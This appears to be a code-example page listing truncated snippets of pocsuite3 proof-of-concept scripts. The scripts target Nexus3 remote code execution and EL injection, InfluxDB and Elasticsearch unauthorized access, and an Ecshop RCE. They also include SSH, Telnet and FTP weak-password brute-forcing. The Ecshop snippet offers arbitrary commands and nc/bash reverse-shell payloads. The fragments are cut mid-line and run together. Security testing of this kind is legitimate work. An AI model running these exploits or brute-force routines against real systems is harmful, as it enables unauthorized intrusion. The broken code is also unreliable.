How to use the pocsuite3.api.POC_CATEGORY function in pocsuite3
To help you get started, we’ve selected a few pocsuite3 examples, based on popular ways it is used in public projects.
Secure your code as it's written. Use Snyk Code to scan source code in minutes - no build needed - and fix issues immediately.
shadowsock5 / Poc / Nexus / Nexus_poc.py View on Github 
from string import ascii_letters
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE
'''
CVE-2019-7238
需要Nexus服务器上有资源(比如Jar包)
'''
class Nexus3_RCE_POC(POCBase):
vulID = 'Nexus3-CVE-2019-7238'
appName = 'Nexus3'
appVersion = 'Nexus Repository Manager OSS/Pro 3.6.2 版本到 3.14.0 版本'
category = POC_CATEGORY.EXPLOITS.REMOTE
vulType = VUL_TYPE.CODE_EXECUTION
vulDate = '2019-02-05' # 漏洞公开的时间,不知道就写今天
author = 'shadowsock5' # PoC作者的大名
createDate = '2019-02-20' # 编写 PoC 的日期
updateDate = '2020-02-17' # PoC 更新的时间,默认和编写时间一样
references = ['https://mp.weixin.qq.com/s/P1KC7wadbEZbHvavYQjbVA'] # 漏洞地址来源,0day不用写
name = 'Nexus3 RCE' # PoC 名称
install_requires = [] # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写
cvss = u"高危"
# 使用随机字符串作为banner,通过ceye的接口判断命令是否被执行
DOMAIN = 'wvg689.ceye.io'
TOKEN = '76dce59a986eab595838f7dc74903035'
BANNER = ''.join([random.choice(ascii_letters) for i in range(6)])
CEYE_URL = 'http://api.ceye.io/v1/records?token={0}&type=dns&filter={1}'.format(TOKEN, BANNER)from pocsuite3.lib.core.data import paths
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE
'''
CVE-2018-16621: Nexus 3 EL injection
Admin access is required
'''
class Nexus3_2018_16621_EL_INJECTION_POC(POCBase):
vulID = 'Nexus3-CVE-2018-16621'
appName = 'Nexus3'
appVersion = 'Nexus Repository Manager OSS/Pro <=3.13.0'
category = POC_CATEGORY.EXPLOITS.REMOTE
vulType = VUL_TYPE.CODE_EXECUTION
vulDate = '2018-10-18' # 漏洞公开的时间,不知道就写今天
author = 'shadowsock5' # PoC作者的大名
createDate = '2020-04-03' # 编写 PoC 的日期
updateDate = '2020-04-07' # PoC 更新的时间,默认和编写时间一样
references = ['https://support.sonatype.com/hc/en-us/articles/360010789153-CVE-2018-16621-Nexus-Repository-Manager-Java-Injection-October-17-2018'] # 漏洞地址来源,0day不用写
name = 'Nexus3 EL injection' # PoC 名称
install_requires = [] # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写
cvss = u"中危"
# 使用随机字符串作为banner,计算数字之后返回
ran1 = random.randint(1,100)
ran2 = random.randint(100,200)#!/usr/bin/env python
#coding=utf-8
import traceback
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE
class InfluxDB_POC(POCBase):
vulID = 'InfluxDB-unauthorized-access' # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
appName = 'InfluxDB'
appVersion = ''
category = POC_CATEGORY.EXPLOITS.REMOTE
vulType = VUL_TYPE.INFORMATION_DISCLOSURE
vulDate = '2020-04-13' # 漏洞公开的时间,不知道就写今天
author = 'shadowsock5' # PoC作者的大名
createDate = '2020-04-13' # 编写 PoC 的日期
updateDate = '2020-04-13' # PoC 更新的时间,默认和编写时间一样
references = ['https://github.com/chaitin/xray/blob/master/pocs/influxdb-unauth.yml'] # 漏洞地址来源,0day不用写
name = 'InfluxDB未授权访问漏洞' # PoC 名称
cvss = u"高危"
def _verify(self):
result={}
vul_url = self.url
target_url = vul_urlversion = '3'
author = ['seebug']
vulDate = '2018-09-18'
createDate = '2018-09-18'
updateDate = '2018-09-18'
references = ['https://www.seebug.org/vuldb/ssvid-89688']
name = 'SSH 弱密码'
appPowerLink = ''
appName = 'ssh'
appVersion = 'All'
vulType = VUL_TYPE.WEAK_PASSWORD
desc = '''ssh 存在弱密码,导致攻击者可连接主机进行恶意操作'''
samples = ['']
install_requires = ['paramiko']
category = POC_CATEGORY.TOOLS.CRACK
protocol = POC_CATEGORY.PROTOCOL.SSH
def _verify(self):
result = {}
host = self.getg_option("rhost")
port = self.getg_option("rport") or 22
task_queue = queue.Queue()
result_queue = queue.Queue()
ssh_burst(host, port, task_queue, result_queue)
if not result_queue.empty():
username, password = result_queue.get()
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Username'] = username
result['VerifyInfo']['Password'] = password
return self.parse_attack(result)from pocsuite3.lib.core.data import paths
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase, logger
from pocsuite3.api import POC_CATEGORY, VUL_TYPE
'''
CVE-2020-10204: Nexus 3 EL injection
Admin access is required
'''
class Nexus3_2020_10204_EL_INJECTION_POC(POCBase):
vulID = 'Nexus3-CVE-2020-10204'
appName = 'Nexus3'
appVersion = 'Nexus Repository Manager OSS/Pro <=3.21.1'
category = POC_CATEGORY.EXPLOITS.REMOTE
vulType = VUL_TYPE.CODE_EXECUTION
vulDate = '2020-04-01' # 漏洞公开的时间,不知道就写今天
author = 'shadowsock5' # PoC作者的大名
createDate = '2020-04-03' # 编写 PoC 的日期
updateDate = '2020-04-03' # PoC 更新的时间,默认和编写时间一样
references = ['https://support.sonatype.com/hc/en-us/articles/360044356194-CVE-2020-10204-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31'] # 漏洞地址来源,0day不用写
name = 'Nexus3 EL injection' # PoC 名称
install_requires = [] # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写
cvss = u"高危"
# 使用随机字符串作为banner,计算数字之后返回
ran1 = random.randint(1,100)
ran2 = random.randint(100,200)vulID = '89687'
version = '3'
author = ['seebug']
vulDate = '2018-09-19'
createDate = '2018-09-19'
updateDate = '2018-09-19'
references = ['https://www.seebug.org/vuldb/ssvid-89687']
name = 'Telnet 弱密码'
appPowerLink = ''
appName = 'telnet'
appVersion = 'All'
vulType = VUL_TYPE.WEAK_PASSWORD
desc = '''telnet 存在弱密码,导致攻击者可登录主机进行恶意操作'''
samples = ['']
category = POC_CATEGORY.TOOLS.CRACK
protocol = POC_CATEGORY.PROTOCOL.TELENT
def _verify(self):
result = {}
host = self.getg_option("rhost")
port = self.getg_option("rport") or 23
telnet_burst(host, port)
if not result_queue.empty():
username, password = result_queue.get()
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Username'] = username
result['VerifyInfo']['Password'] = password
return self.parse_attack(result)
def _attack(self):import traceback
# 将输入的url转换为ip:port,供socket使用
from pocsuite3.lib.utils import url2ip
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE
class Elasticsearch_POC(POCBase):
vulID = 'Elasticsearch-unauthorized-access' # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
appName = 'Elasticsearch'
appVersion = ''
category = POC_CATEGORY.EXPLOITS.REMOTE
vulType = VUL_TYPE.INFORMATION_DISCLOSURE
vulDate = '2020-04-17' # 漏洞公开的时间,不知道就写今天
author = 'shadowsock5' # PoC作者的大名
createDate = '2020-04-17' # 编写 PoC 的日期
updateDate = '2020-04-17' # PoC 更新的时间,默认和编写时间一样
references = ['https://github.com/chaitin/xray/blob/master/pocs/elasticsearch-unauth.yml', 'https://www.cnblogs.com/xiaozi/p/8275201.html'] # 漏洞地址来源,0day不用写
name = 'Elasticsearch未授权访问漏洞' # PoC 名称
cvss = u"高危"
'''
poc检测两个特征,加强可靠性:
1,GET访问根路径,返回es的slogan:`You Know, for Search`;
2,GET访问`/_cat`,响应里有`/_cat/master`
'''vulID = '62522'
version = '3'
author = ['seebug']
vulDate = '2013-11-21'
createDate = '2013-11-21'
updateDate = '2013-11-21'
references = ['http://sebug.net/vuldb/ssvid-62522']
name = 'FTP 弱密码'
appPowerLink = ''
appName = 'ftp'
appVersion = 'All'
vulType = VUL_TYPE.WEAK_PASSWORD
desc = '''ftp 存在弱密码,导致攻击者可连接进行文件管理进行恶意操作'''
samples = ['']
category = POC_CATEGORY.TOOLS.CRACK
protocol = POC_CATEGORY.PROTOCOL.FTP
def _verify(self):
result = {}
host = self.getg_option("rhost")
port = self.getg_option("rport") or 21
ftp_burst(host, port)
if not result_queue.empty():
username, password = result_queue.get()
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Username'] = username
result['VerifyInfo']['Password'] = password
return self.parse_attack(result)
def _attack(self):vulID = '97343' # ssvid
version = '3.0'
author = ['seebug']
vulDate = '2018-06-14'
createDate = '2018-06-14'
updateDate = '2018-06-14'
references = ['https://www.seebug.org/vuldb/ssvid-97343']
name = 'Ecshop 2.x/3.x Remote Code Execution'
appPowerLink = ''
appName = 'ECSHOP'
appVersion = '2.x,3.x'
vulType = VUL_TYPE.CODE_EXECUTION
desc = '''近日,Ecshop爆出全版本SQL注入及任意代码执行漏洞,受影响的版本有:Ecshop 2.x,Ecshop 3.x-3.6.0'''
samples = []
install_requires = ['']
category = POC_CATEGORY.EXPLOITS.WEBAPP
protocol = POC_CATEGORY.PROTOCOL.HTTP
pocDesc = '''在攻击模式下,可以通过command参数来指定任意命令,app_version用于选定ecshop版本'''
def _options(self):
o = OrderedDict()
o["command"] = OptString("whoami", description='攻击时自定义命令')
o["app_version"] = OptItems(['2.x', '3.x', 'Auto'], selected="Auto", description='目标版本,可自动匹配')
payload = {
"nc": REVERSE_PAYLOAD.NC,
"bash": REVERSE_PAYLOAD.BASH,
}
o["payload"] = OptDict(default=payload, selected="bash")
return o
def gen_ec2payload(self, phpcode):
# ECShop 2.x payloadvulID = '89688'
version = '3'
author = ['seebug']
vulDate = '2018-09-18'
createDate = '2018-09-18'
updateDate = '2018-09-18'
references = ['https://www.seebug.org/vuldb/ssvid-89688']
name = 'SSH 弱密码'
appPowerLink = ''
appName = 'ssh'
appVersion = 'All'
vulType = VUL_TYPE.WEAK_PASSWORD
desc = '''ssh 存在弱密码,导致攻击者可连接主机进行恶意操作'''
samples = ['']
install_requires = ['paramiko']
category = POC_CATEGORY.TOOLS.CRACK
protocol = POC_CATEGORY.PROTOCOL.SSH
def _verify(self):
result = {}
host = self.getg_option("rhost")
port = self.getg_option("rport") or 22
task_queue = queue.Queue()
result_queue = queue.Queue()
ssh_burst(host, port, task_queue, result_queue)
if not result_queue.empty():
username, password = result_queue.get()
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Username'] = username
result['VerifyInfo']['Password'] = passwordpocsuite3
Open-sourced remote vulnerability testing framework.
Package Health Score
78 / 100Popular pocsuite3 functions
- pocsuite3.api.logger
- pocsuite3.api.logger.info
- pocsuite3.api.Output
- pocsuite3.api.POC_CATEGORY
- pocsuite3.api.POCBase
- pocsuite3.api.register_poc
- pocsuite3.api.requests
- pocsuite3.api.requests.get
- pocsuite3.api.requests.post
- pocsuite3.api.VUL_TYPE
- pocsuite3.lib.core.common.data_to_stdout
- pocsuite3.lib.core.data.conf
- pocsuite3.lib.core.data.kb
- pocsuite3.lib.core.data.logger
- pocsuite3.lib.core.data.logger.debug
- pocsuite3.lib.core.data.logger.error
- pocsuite3.lib.core.data.logger.info
- pocsuite3.lib.core.data.paths
- pocsuite3.lib.core.datatype.AttribDict
- pocsuite3.lib.request.requests.get